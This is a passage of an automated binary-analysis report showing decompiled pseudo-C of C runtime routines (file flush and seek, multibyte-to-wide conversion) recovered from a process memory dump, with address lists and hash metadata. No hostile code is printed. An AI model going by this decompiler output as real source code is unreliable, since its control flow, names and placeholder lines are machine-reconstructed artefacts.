                                                                                                                        								_t99 = _t81;
                                                                                                                        								__eflags = _t81 - _t78;
                                                                                                                        								if(_t81 >= _t78) {
                                                                                                                        									_t99 = _t78;
                                                                                                                        								}
                                                                                                                        								E0040E0C0(_t81, _t99, _t100,  *_t100, _v8, _t99);
                                                                                                                        								 *(_t100 + 4) =  *(_t100 + 4) - _t99;
                                                                                                                        								 *_t100 =  *_t100 + _t99;
                                                                                                                        								_t101 = _t101 + 0xc;
                                                                                                                        								_t81 = _t81 - _t99;
                                                                                                                        								_v8 = _v8 + _t99;
                                                                                                                        								goto L27;
                                                                                                                        								L31:
                                                                                                                        								__eflags = _t81;
                                                                                                                        							} while (_t81 != 0);
                                                                                                                        							goto L32;
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        					L3:
                                                                                                                        					_t61 = E0040F27B(_t105);
                                                                                                                        					_push(0);
                                                                                                                        					_push(0);
                                                                                                                        					_push(0);
                                                                                                                        					_push(0);
                                                                                                                        					_push(0);
                                                                                                                        					 *_t61 = 0x16;
                                                                                                                        					E00411AE6(_t90, 0, _t100);
                                                                                                                        					goto L4;
                                                                                                                        				}
                                                                                                                        			}





























                                                                                                                        0x0040ed64
                                                                                                                        0x0040ed74
                                                                                                                        0x0040ed9a
                                                                                                                        0x00000000
                                                                                                                        0x0040ed7b
                                                                                                                        0x0040ed7b
                                                                                                                        0x0040ed7e
                                                                                                                        0x0040ed80
                                                                                                                        0x0040eda1
                                                                                                                        0x0040eda4
                                                                                                                        0x0040eda6
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040eda8
                                                                                                                        0x0040edad
                                                                                                                        0x0040edb0
                                                                                                                        0x0040edb3
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040edb8
                                                                                                                        0x0040edbc
                                                                                                                        0x0040edc3
                                                                                                                        0x0040edc6
                                                                                                                        0x0040edc9
                                                                                                                        0x0040edcb
                                                                                                                        0x0040edd5
                                                                                                                        0x0040edcd
                                                                                                                        0x0040edd0
                                                                                                                        0x0040edd0
                                                                                                                        0x0040eddc
                                                                                                                        0x0040edde
                                                                                                                        0x0040eea3
                                                                                                                        0x00000000
                                                                                                                        0x0040ede4
                                                                                                                        0x0040ede4
                                                                                                                        0x0040ede7
                                                                                                                        0x0040ede7
                                                                                                                        0x0040eded
                                                                                                                        0x0040ee1e
                                                                                                                        0x0040ee1e
                                                                                                                        0x0040ee21
                                                                                                                        0x0040ee7a
                                                                                                                        0x0040ee81
                                                                                                                        0x0040ee84
                                                                                                                        0x0040eeaf
                                                                                                                        0x0040eeaf
                                                                                                                        0x0040eeb1
                                                                                                                        0x00000000
                                                                                                                        0x0040eeb5
                                                                                                                        0x0040ee86
                                                                                                                        0x0040ee89
                                                                                                                        0x0040ee8c
                                                                                                                        0x0040ee8d
                                                                                                                        0x0040ee90
                                                                                                                        0x0040ee92
                                                                                                                        0x0040ee94
                                                                                                                        0x0040ee94
                                                                                                                        0x00000000
                                                                                                                        0x0040ee92
                                                                                                                        0x0040ee23
                                                                                                                        0x0040ee25
                                                                                                                        0x0040ee32
                                                                                                                        0x0040ee32
                                                                                                                        0x0040ee36
                                                                                                                        0x0040ee38
                                                                                                                        0x0040ee3c
                                                                                                                        0x0040ee3e
                                                                                                                        0x0040ee41
                                                                                                                        0x0040ee41
                                                                                                                        0x0040ee41
                                                                                                                        0x0040ee43
                                                                                                                        0x0040ee44
                                                                                                                        0x0040ee4e
                                                                                                                        0x0040ee4f
                                                                                                                        0x0040ee54
                                                                                                                        0x0040ee57
                                                                                                                        0x0040ee5a
                                                                                                                        0x0040eebd
                                                                                                                        0x0040eebd
                                                                                                                        0x0040eec1
                                                                                                                        0x00000000
                                                                                                                        0x0040ee5c
                                                                                                                        0x0040ee5c
                                                                                                                        0x0040ee5e
                                                                                                                        0x0040ee60
                                                                                                                        0x0040ee62
                                                                                                                        0x0040ee62
                                                                                                                        0x0040ee64
                                                                                                                        0x0040ee67
                                                                                                                        0x0040ee69
                                                                                                                        0x0040ee6b
                                                                                                                        0x00000000
                                                                                                                        0x0040ee6d
                                                                                                                        0x0040ee6d
                                                                                                                        0x0040ee6d
                                                                                                                        0x00000000
                                                                                                                        0x0040ee6d
                                                                                                                        0x0040ee6b
                                                                                                                        0x0040ee5a
                                                                                                                        0x0040ee28
                                                                                                                        0x0040ee2e
                                                                                                                        0x0040ee30
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040ee30
                                                                                                                        0x0040edef
                                                                                                                        0x0040edf2
                                                                                                                        0x0040edf4
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040edf6
                                                                                                                        0x0040eeab
                                                                                                                        0x0040eeab
                                                                                                                        0x0040eeab
                                                                                                                        0x00000000
                                                                                                                        0x0040eeab
                                                                                                                        0x0040edfc
                                                                                                                        0x0040edfe
                                                                                                                        0x0040ee00
                                                                                                                        0x0040ee02
                                                                                                                        0x0040ee02
                                                                                                                        0x0040ee0a
                                                                                                                        0x0040ee0f
                                                                                                                        0x0040ee12
                                                                                                                        0x0040ee14
                                                                                                                        0x0040ee17
                                                                                                                        0x0040ee19
                                                                                                                        0x00000000
                                                                                                                        0x0040ee9b
                                                                                                                        0x0040ee9b
                                                                                                                        0x0040ee9b
                                                                                                                        0x00000000
                                                                                                                        0x0040ede4
                                                                                                                        0x0040edde
                                                                                                                        0x0040ed82
                                                                                                                        0x0040ed82
                                                                                                                        0x0040ed87
                                                                                                                        0x0040ed88
                                                                                                                        0x0040ed89
                                                                                                                        0x0040ed8a
                                                                                                                        0x0040ed8b
                                                                                                                        0x0040ed8c
                                                                                                                        0x0040ed92
                                                                                                                        0x00000000
                                                                                                                        0x0040ed97

                                                                                                                        APIs
                                                                                                                        • __flush.LIBCMT ref: 0040EE28
                                                                                                                        • __fileno.LIBCMT ref: 0040EE48
                                                                                                                        • __locking.LIBCMT ref: 0040EE4F
                                                                                                                        • __flsbuf.LIBCMT ref: 0040EE7A
                                                                                                                          • Part of subcall function 0040F27B: __getptd_noexit.LIBCMT ref: 0040F27B
                                                                                                                          • Part of subcall function 00411AE6: __decode_pointer.LIBCMT ref: 00411AF1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.613517029.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.613580221.0000000000458000.00000040.00000001.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3240763771-0
                                                                                                                        • Opcode ID: a37a9db44f56a59372263b5fc7ef4f83e440b6ad469a9998af22127d97e2e595
                                                                                                                        • Instruction ID: cce06177d790619f16dce141d26e64fa5285875700a8a2fd0a33240c7c9fa16b
                                                                                                                        • Opcode Fuzzy Hash: a37a9db44f56a59372263b5fc7ef4f83e440b6ad469a9998af22127d97e2e595
                                                                                                                        • Instruction Fuzzy Hash: 9D41C931A00609DBDB249F67C98459FBBB5EF80360F24893EE455A72C0D778DE61DB88
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 97%
                                                                                                                        			E00408ED0(void* __ebx, void* __edx, void* __ebp, signed int* _a4, signed int _a8, intOrPtr _a12) {
                                                                                                                        				void* __edi;
                                                                                                                        				void* __esi;
                                                                                                                        				signed int _t30;
                                                                                                                        				signed int _t31;
                                                                                                                        				signed int _t32;
                                                                                                                        				signed int _t33;
                                                                                                                        				signed int _t35;
                                                                                                                        				signed int _t39;
                                                                                                                        				void* _t42;
                                                                                                                        				intOrPtr _t43;
                                                                                                                        				void* _t45;
                                                                                                                        				signed int _t48;
                                                                                                                        				signed int* _t53;
                                                                                                                        				void* _t54;
                                                                                                                        				void* _t55;
                                                                                                                        				void* _t57;
                                                                                                                        
                                                                                                                        				_t54 = __ebp;
                                                                                                                        				_t45 = __edx;
                                                                                                                        				_t42 = __ebx;
                                                                                                                        				_t53 = _a4;
                                                                                                                        				if(_t53 == 0) {
                                                                                                                        					L40:
                                                                                                                        					_t31 = _t30 | 0xffffffff;
                                                                                                                        					__eflags = _t31;
                                                                                                                        					return _t31;
                                                                                                                        				} else {
                                                                                                                        					_t43 = _a12;
                                                                                                                        					if(_t43 == 2) {
                                                                                                                        						goto L40;
                                                                                                                        					} else {
                                                                                                                        						_t30 = _t53[0xe];
                                                                                                                        						if(_t30 == 0xffffffff || _t30 == 0xfffffffd) {
                                                                                                                        							goto L40;
                                                                                                                        						} else {
                                                                                                                        							_t48 = _a8;
                                                                                                                        							if(_t53[0x17] != 0x77) {
                                                                                                                        								__eflags = _t43 - 1;
                                                                                                                        								if(_t43 == 1) {
                                                                                                                        									_t48 = _t48 + _t53[0x1a];
                                                                                                                        									__eflags = _t48;
                                                                                                                        								}
                                                                                                                        								__eflags = _t48;
                                                                                                                        								if(_t48 < 0) {
                                                                                                                        									goto L39;
                                                                                                                        								} else {
                                                                                                                        									__eflags = _t53[0x16];
                                                                                                                        									if(__eflags == 0) {
                                                                                                                        										_t33 = _t53[0x1a];
                                                                                                                        										__eflags = _t48 - _t33;
                                                                                                                        										if(_t48 < _t33) {
                                                                                                                        											_t30 = E004086C0(_t42, _t54, _t53);
                                                                                                                        											_t55 = _t55 + 4;
                                                                                                                        											__eflags = _t30;
                                                                                                                        											if(_t30 < 0) {
                                                                                                                        												goto L39;
                                                                                                                        											} else {
                                                                                                                        												goto L27;
                                                                                                                        											}
                                                                                                                        										} else {
                                                                                                                        											_t48 = _t48 - _t33;
                                                                                                                        											L27:
                                                                                                                        											__eflags = _t48;
                                                                                                                        											if(_t48 == 0) {
                                                                                                                        												L38:
                                                                                                                        												return _t53[0x1a];
                                                                                                                        											} else {
                                                                                                                        												__eflags = _t53[0x12];
                                                                                                                        												if(_t53[0x12] != 0) {
                                                                                                                        													L30:
                                                                                                                        													__eflags = _t53[0x1b] - 0xffffffff;
                                                                                                                        													if(_t53[0x1b] != 0xffffffff) {
                                                                                                                        														_t53[0x1a] = _t53[0x1a] + 1;
                                                                                                                        														_t48 = _t48 - 1;
                                                                                                                        														__eflags = _t53[0x1c];
                                                                                                                        														_t53[0x1b] = 0xffffffff;
                                                                                                                        														if(_t53[0x1c] != 0) {
                                                                                                                        															_t53[0xe] = 1;
                                                                                                                        														}
                                                                                                                        													}
                                                                                                                        													__eflags = _t48;
                                                                                                                        													if(_t48 <= 0) {
                                                                                                                        														goto L38;
                                                                                                                        													} else {
                                                                                                                        														while(1) {
                                                                                                                        															_t35 = 0x4000;
                                                                                                                        															__eflags = _t48 - 0x4000;
                                                                                                                        															if(_t48 < 0x4000) {
                                                                                                                        																_t35 = _t48;
                                                                                                                        															}
                                                                                                                        															_t30 = E00408BF0(_t45, _t53, _t53[0x12], _t35);
                                                                                                                        															_t55 = _t55 + 0xc;
                                                                                                                        															__eflags = _t30;
                                                                                                                        															if(_t30 <= 0) {
                                                                                                                        																goto L39;
                                                                                                                        															}
                                                                                                                        															_t48 = _t48 - _t30;
                                                                                                                        															__eflags = _t48;
                                                                                                                        															if(_t48 > 0) {
                                                                                                                        																continue;
                                                                                                                        															} else {
                                                                                                                        																goto L38;
                                                                                                                        															}
                                                                                                                        															goto L41;
                                                                                                                        														}
                                                                                                                        														goto L39;
                                                                                                                        													}
                                                                                                                        												} else {
                                                                                                                        													_t30 = E0040DFE9(_t42, _t45, _t48, 0x4000);
                                                                                                                        													_t55 = _t55 + 4;
                                                                                                                        													_t53[0x12] = _t30;
                                                                                                                        													__eflags = _t30;
                                                                                                                        													if(_t30 == 0) {
                                                                                                                        														goto L39;
                                                                                                                        													} else {
                                                                                                                        														goto L30;
                                                                                                                        													}
                                                                                                                        												}
                                                                                                                        											}
                                                                                                                        										}
                                                                                                                        									} else {
                                                                                                                        										_push(0);
                                                                                                                        										_push(_t48);
                                                                                                                        										_push(_t53[0x10]);
                                                                                                                        										_t53[0x1b] = 0xffffffff;
                                                                                                                        										_t53[1] = 0;
                                                                                                                        										 *_t53 = _t53[0x11];
                                                                                                                        										_t30 = E0040F72B(_t42, _t53[0x10], _t48, _t53, __eflags);
                                                                                                                        										__eflags = _t30;
                                                                                                                        										if(_t30 < 0) {
                                                                                                                        											goto L39;
                                                                                                                        										} else {
                                                                                                                        											_t53[0x1a] = _t48;
                                                                                                                        											_t53[0x19] = _t48;
                                                                                                                        											return _t48;
                                                                                                                        										}
                                                                                                                        									}
                                                                                                                        								}
                                                                                                                        							} else {
                                                                                                                        								if(_t43 == 0) {
                                                                                                                        									_t48 = _t48 - _t53[0x19];
                                                                                                                        								}
                                                                                                                        								if(_t48 < 0) {
                                                                                                                        									L39:
                                                                                                                        									_t32 = _t30 | 0xffffffff;
                                                                                                                        									__eflags = _t32;
                                                                                                                        									return _t32;
                                                                                                                        								} else {
                                                                                                                        									if(_t53[0x11] != 0) {
                                                                                                                        										L11:
                                                                                                                        										if(_t48 <= 0) {
                                                                                                                        											L17:
                                                                                                                        											return _t53[0x19];
                                                                                                                        										} else {
                                                                                                                        											while(1) {
                                                                                                                        												_t39 = 0x4000;
                                                                                                                        												if(_t48 < 0x4000) {
                                                                                                                        													_t39 = _t48;
                                                                                                                        												}
                                                                                                                        												_t30 = E00408430(_t42, _t45, _t53, _t53[0x11], _t39);
                                                                                                                        												_t55 = _t55 + 0xc;
                                                                                                                        												if(_t30 == 0) {
                                                                                                                        													goto L39;
                                                                                                                        												}
                                                                                                                        												_t48 = _t48 - _t30;
                                                                                                                        												if(_t48 > 0) {
                                                                                                                        													continue;
                                                                                                                        												} else {
                                                                                                                        													goto L17;
                                                                                                                        												}
                                                                                                                        												goto L41;
                                                                                                                        											}
                                                                                                                        											goto L39;
                                                                                                                        										}
                                                                                                                        									} else {
                                                                                                                        										_t30 = E0040DFE9(_t42, _t45, _t48, 0x4000);
                                                                                                                        										_t57 = _t55 + 4;
                                                                                                                        										_t53[0x11] = _t30;
                                                                                                                        										if(_t30 == 0) {
                                                                                                                        											goto L39;
                                                                                                                        										} else {
                                                                                                                        											E0040E430(_t48, _t30, 0, 0x4000);
                                                                                                                        											_t55 = _t57 + 0xc;
                                                                                                                        											goto L11;
                                                                                                                        										}
                                                                                                                        									}
                                                                                                                        								}
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        				L41:
                                                                                                                        			}



















                                                                                                                        0x00408ed0
                                                                                                                        0x00408ed0
                                                                                                                        0x00408ed0
                                                                                                                        0x00408ed1
                                                                                                                        0x00408ed7
                                                                                                                        0x0040904f
                                                                                                                        0x0040904f
                                                                                                                        0x0040904f
                                                                                                                        0x00409053
                                                                                                                        0x00408edd
                                                                                                                        0x00408edd
                                                                                                                        0x00408ee4
                                                                                                                        0x00000000
                                                                                                                        0x00408eea
                                                                                                                        0x00408eea
                                                                                                                        0x00408ef0
                                                                                                                        0x00000000
                                                                                                                        0x00408eff
                                                                                                                        0x00408f04
                                                                                                                        0x00408f08
                                                                                                                        0x00408f7d
                                                                                                                        0x00408f80
                                                                                                                        0x00408f82
                                                                                                                        0x00408f82
                                                                                                                        0x00408f82
                                                                                                                        0x00408f85
                                                                                                                        0x00408f87
                                                                                                                        0x00000000
                                                                                                                        0x00408f8d
                                                                                                                        0x00408f8d
                                                                                                                        0x00408f91
                                                                                                                        0x00408fc8
                                                                                                                        0x00408fcb
                                                                                                                        0x00408fcd
                                                                                                                        0x00408fd4
                                                                                                                        0x00408fd9
                                                                                                                        0x00408fdc
                                                                                                                        0x00408fde
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00408fcf
                                                                                                                        0x00408fcf
                                                                                                                        0x00408fe0
                                                                                                                        0x00408fe0
                                                                                                                        0x00408fe2
                                                                                                                        0x00409043
                                                                                                                        0x00409048
                                                                                                                        0x00408fe4
                                                                                                                        0x00408fe4
                                                                                                                        0x00408fe8
                                                                                                                        0x00408ffe
                                                                                                                        0x00408ffe
                                                                                                                        0x00409002
                                                                                                                        0x00409004
                                                                                                                        0x00409007
                                                                                                                        0x00409008
                                                                                                                        0x0040900c
                                                                                                                        0x00409013
                                                                                                                        0x00409015
                                                                                                                        0x00409015
                                                                                                                        0x00409013
                                                                                                                        0x0040901c
                                                                                                                        0x0040901e
                                                                                                                        0x00000000
                                                                                                                        0x00409020
                                                                                                                        0x00409020
                                                                                                                        0x00409020
                                                                                                                        0x00409025
                                                                                                                        0x00409027
                                                                                                                        0x00409029
                                                                                                                        0x00409029
                                                                                                                        0x00409031
                                                                                                                        0x00409036
                                                                                                                        0x00409039
                                                                                                                        0x0040903b
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040903d
                                                                                                                        0x0040903f
                                                                                                                        0x00409041
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00409041
                                                                                                                        0x00000000
                                                                                                                        0x00409020
                                                                                                                        0x00408fea
                                                                                                                        0x00408fef
                                                                                                                        0x00408ff4
                                                                                                                        0x00408ff7
                                                                                                                        0x00408ffa
                                                                                                                        0x00408ffc
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00408ffc
                                                                                                                        0x00408fe8
                                                                                                                        0x00408fe2
                                                                                                                        0x00408f93
                                                                                                                        0x00408f99
                                                                                                                        0x00408f9b
                                                                                                                        0x00408f9c
                                                                                                                        0x00408f9d
                                                                                                                        0x00408fa4
                                                                                                                        0x00408fab
                                                                                                                        0x00408fad
                                                                                                                        0x00408fb5
                                                                                                                        0x00408fb7
                                                                                                                        0x00000000
                                                                                                                        0x00408fbd
                                                                                                                        0x00408fbd
                                                                                                                        0x00408fc0
                                                                                                                        0x00408fc7
                                                                                                                        0x00408fc7
                                                                                                                        0x00408fb7
                                                                                                                        0x00408f91
                                                                                                                        0x00408f0a
                                                                                                                        0x00408f0c
                                                                                                                        0x00408f0e
                                                                                                                        0x00408f0e
                                                                                                                        0x00408f13
                                                                                                                        0x00409049
                                                                                                                        0x0040904a
                                                                                                                        0x0040904a
                                                                                                                        0x0040904e
                                                                                                                        0x00408f19
                                                                                                                        0x00408f1d
                                                                                                                        0x00408f47
                                                                                                                        0x00408f49
                                                                                                                        0x00408f77
                                                                                                                        0x00408f7c
                                                                                                                        0x00408f4b
                                                                                                                        0x00408f50
                                                                                                                        0x00408f50
                                                                                                                        0x00408f57
                                                                                                                        0x00408f59
                                                                                                                        0x00408f59
                                                                                                                        0x00408f61
                                                                                                                        0x00408f66
                                                                                                                        0x00408f6b
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00408f71
                                                                                                                        0x00408f75
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00408f75
                                                                                                                        0x00000000
                                                                                                                        0x00408f50
                                                                                                                        0x00408f1f
                                                                                                                        0x00408f24
                                                                                                                        0x00408f29
                                                                                                                        0x00408f2c
                                                                                                                        0x00408f31
                                                                                                                        0x00000000
                                                                                                                        0x00408f37
                                                                                                                        0x00408f3f
                                                                                                                        0x00408f44
                                                                                                                        0x00000000
                                                                                                                        0x00408f44
                                                                                                                        0x00408f31
                                                                                                                        0x00408f1d
                                                                                                                        0x00408f13
                                                                                                                        0x00408f08
                                                                                                                        0x00408ef0
                                                                                                                        0x00408ee4
                                                                                                                        0x00000000

                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.613517029.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.613580221.0000000000458000.00000040.00000001.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: _fseek_malloc_memset
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 208892515-0
                                                                                                                        • Opcode ID: 2f34fd9539ec26f1d2d99c47131393a8ed76af65d5b8681582b39209b64c9892
                                                                                                                        • Instruction ID: dab0bcb43c4b05336bba1bdf2d398b5082bebd3df36d34df690b04089cdca156
                                                                                                                        • Opcode Fuzzy Hash: 2f34fd9539ec26f1d2d99c47131393a8ed76af65d5b8681582b39209b64c9892
                                                                                                                        • Instruction Fuzzy Hash: 184184B2600B024AD6309A2EA90171772E69FC0714F140A3EE6E6A67D3EB7DEC458759
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E004177D0(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                        				char _v8;
                                                                                                                        				signed int _v12;
                                                                                                                        				char _v20;
                                                                                                                        				char _t43;
                                                                                                                        				char _t46;
                                                                                                                        				signed int _t53;
                                                                                                                        				signed int _t54;
                                                                                                                        				intOrPtr _t56;
                                                                                                                        				int _t57;
                                                                                                                        				int _t58;
                                                                                                                        				signed short* _t59;
                                                                                                                        				short* _t60;
                                                                                                                        				int _t65;
                                                                                                                        				char* _t72;
                                                                                                                        
                                                                                                                        				_t72 = _a8;
                                                                                                                        				if(_t72 == 0 || _a12 == 0) {
                                                                                                                        					L5:
                                                                                                                        					return 0;
                                                                                                                        				} else {
                                                                                                                        					if( *_t72 != 0) {
                                                                                                                        						E00411D54( &_v20, _a16);
                                                                                                                        						_t43 = _v20;
                                                                                                                        						__eflags =  *(_t43 + 0x14);
                                                                                                                        						if( *(_t43 + 0x14) != 0) {
                                                                                                                        							_t46 = E00417901( *_t72 & 0x000000ff,  &_v20);
                                                                                                                        							__eflags = _t46;
                                                                                                                        							if(_t46 == 0) {
                                                                                                                        								__eflags = _a4;
                                                                                                                        								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
                                                                                                                        								if(__eflags != 0) {
                                                                                                                        									L10:
                                                                                                                        									__eflags = _v8;
                                                                                                                        									if(_v8 != 0) {
                                                                                                                        										_t53 = _v12;
                                                                                                                        										_t11 = _t53 + 0x70;
                                                                                                                        										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
                                                                                                                        										__eflags =  *_t11;
                                                                                                                        									}
                                                                                                                        									return 1;
                                                                                                                        								}
                                                                                                                        								L21:
                                                                                                                        								_t54 = E0040F27B(__eflags);
                                                                                                                        								 *_t54 = 0x2a;
                                                                                                                        								__eflags = _v8;
                                                                                                                        								if(_v8 != 0) {
                                                                                                                        									_t54 = _v12;
                                                                                                                        									_t33 = _t54 + 0x70;
                                                                                                                        									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
                                                                                                                        									__eflags =  *_t33;
                                                                                                                        								}
                                                                                                                        								return _t54 | 0xffffffff;
                                                                                                                        							}
                                                                                                                        							_t56 = _v20;
                                                                                                                        							_t65 =  *(_t56 + 0xac);
                                                                                                                        							__eflags = _t65 - 1;
                                                                                                                        							if(_t65 <= 1) {
                                                                                                                        								L17:
                                                                                                                        								__eflags = _a12 -  *(_t56 + 0xac);
                                                                                                                        								if(__eflags < 0) {
                                                                                                                        									goto L21;
                                                                                                                        								}
                                                                                                                        								__eflags = _t72[1];
                                                                                                                        								if(__eflags == 0) {
                                                                                                                        									goto L21;
                                                                                                                        								}
                                                                                                                        								L19:
                                                                                                                        								_t57 =  *(_t56 + 0xac);
                                                                                                                        								__eflags = _v8;
                                                                                                                        								if(_v8 == 0) {
                                                                                                                        									return _t57;
                                                                                                                        								}
                                                                                                                        								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
                                                                                                                        								return _t57;
                                                                                                                        							}
                                                                                                                        							__eflags = _a12 - _t65;
                                                                                                                        							if(_a12 < _t65) {
                                                                                                                        								goto L17;
                                                                                                                        							}
                                                                                                                        							__eflags = _a4;
                                                                                                                        							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
                                                                                                                        							__eflags = _t58;
                                                                                                                        							_t56 = _v20;
                                                                                                                        							if(_t58 != 0) {
                                                                                                                        								goto L19;
                                                                                                                        							}
                                                                                                                        							goto L17;
                                                                                                                        						}
                                                                                                                        						_t59 = _a4;
                                                                                                                        						__eflags = _t59;
                                                                                                                        						if(_t59 != 0) {
                                                                                                                        							 *_t59 =  *_t72 & 0x000000ff;
                                                                                                                        						}
                                                                                                                        						goto L10;
                                                                                                                        					} else {
                                                                                                                        						_t60 = _a4;
                                                                                                                        						if(_t60 != 0) {
                                                                                                                        							 *_t60 = 0;
                                                                                                                        						}
                                                                                                                        						goto L5;
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        			}

















                                                                                                                        0x004177da
                                                                                                                        0x004177e1
                                                                                                                        0x004177f8
                                                                                                                        0x00000000
                                                                                                                        0x004177e8
                                                                                                                        0x004177ea
                                                                                                                        0x00417804
                                                                                                                        0x00417809
                                                                                                                        0x0041780c
                                                                                                                        0x0041780f
                                                                                                                        0x00417838
                                                                                                                        0x0041783f
                                                                                                                        0x00417841
                                                                                                                        0x004178c2
                                                                                                                        0x004178dd
                                                                                                                        0x004178df
                                                                                                                        0x0041781f
                                                                                                                        0x0041781f
                                                                                                                        0x00417822
                                                                                                                        0x00417824
                                                                                                                        0x00417827
                                                                                                                        0x00417827
                                                                                                                        0x00417827
                                                                                                                        0x00417827
                                                                                                                        0x00000000
                                                                                                                        0x0041782d
                                                                                                                        0x004178a1
                                                                                                                        0x004178a1
                                                                                                                        0x004178a6
                                                                                                                        0x004178ac
                                                                                                                        0x004178af
                                                                                                                        0x004178b1
                                                                                                                        0x004178b4
                                                                                                                        0x004178b4
                                                                                                                        0x004178b4
                                                                                                                        0x004178b4
                                                                                                                        0x00000000
                                                                                                                        0x004178b8
                                                                                                                        0x00417843
                                                                                                                        0x00417846
                                                                                                                        0x0041784c
                                                                                                                        0x0041784f
                                                                                                                        0x00417876
                                                                                                                        0x00417879
                                                                                                                        0x0041787f
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00417881
                                                                                                                        0x00417884
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00417886
                                                                                                                        0x00417886
                                                                                                                        0x0041788c
                                                                                                                        0x0041788f
                                                                                                                        0x004177fd
                                                                                                                        0x004177fd
                                                                                                                        0x00417898
                                                                                                                        0x00000000
                                                                                                                        0x00417898
                                                                                                                        0x00417851
                                                                                                                        0x00417854
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00417858
                                                                                                                        0x00417869
                                                                                                                        0x0041786f
                                                                                                                        0x00417871
                                                                                                                        0x00417874
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00417874
                                                                                                                        0x00417811
                                                                                                                        0x00417814
                                                                                                                        0x00417816
                                                                                                                        0x0041781c
                                                                                                                        0x0041781c
                                                                                                                        0x00000000
                                                                                                                        0x004177ec
                                                                                                                        0x004177ec
                                                                                                                        0x004177f1
                                                                                                                        0x004177f5
                                                                                                                        0x004177f5
                                                                                                                        0x00000000
                                                                                                                        0x004177f1
                                                                                                                        0x004177ea

                                                                                                                        APIs
                                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00417804
                                                                                                                        • __isleadbyte_l.LIBCMT ref: 00417838
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000009,?,?,?,00000000,?), ref: 00417869
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,?,00000000,?), ref: 004178D7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.613517029.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.613580221.0000000000458000.00000040.00000001.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3058430110-0
                                                                                                                        • Opcode ID: 6222122cbe0cb2f68c18663a92cb4752c6003c1a4542f4be2abdf672c3a96928
                                                                                                                        • Instruction ID: bbf7777714f6dd507eda31f5512cc90a11f0c64677eeb72866c0302a65969965
                                                                                                                        • Opcode Fuzzy Hash: 6222122cbe0cb2f68c18663a92cb4752c6003c1a4542f4be2abdf672c3a96928
                                                                                                                        • Instruction Fuzzy Hash: F631C031A08256EFDB20EF68C8849EA3BB5FF01311F15856AE4758B291E334EDC1DB59
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __recalloc.LIBCMT ref: 00402C98
                                                                                                                        • _calloc.LIBCMT ref: 00402CD1
                                                                                                                          • Part of subcall function 00401030: RaiseException.KERNEL32(-000000013F130D15,00000001,00000000,00000000,00402D58,8007000E,00000001,?,00402E76,?,?,?,00000080,?,?), ref: 0040101C
                                                                                                                          • Part of subcall function 00401030: GetLastError.KERNEL32(?,?,?,?,00402F36,004023A6,00000003,?,004023A6,00F3F310), ref: 00401030
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.613517029.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.613580221.0000000000458000.00000040.00000001.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorExceptionLastRaise__recalloc_calloc
                                                                                                                        • String ID: !@
                                                                                                                        • API String ID: 216479612-232398386
